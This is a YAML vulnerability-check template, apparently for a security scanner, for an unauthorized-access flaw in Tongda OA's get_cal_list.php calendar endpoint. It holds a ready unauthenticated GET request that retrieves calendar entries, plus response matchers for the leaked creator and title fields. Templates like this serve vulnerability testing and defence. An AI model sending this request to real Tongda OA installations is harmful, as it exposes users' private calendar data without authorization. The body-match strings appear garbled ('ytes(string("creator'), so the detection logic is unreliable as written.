product: 通达OA
vName: 通达OA get_cal_list.php未授权访问
type: 访问控制
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaday
      header:
        Accept-Encoding: deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ytes(string("creator
              - ytes(string("originalTitle
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and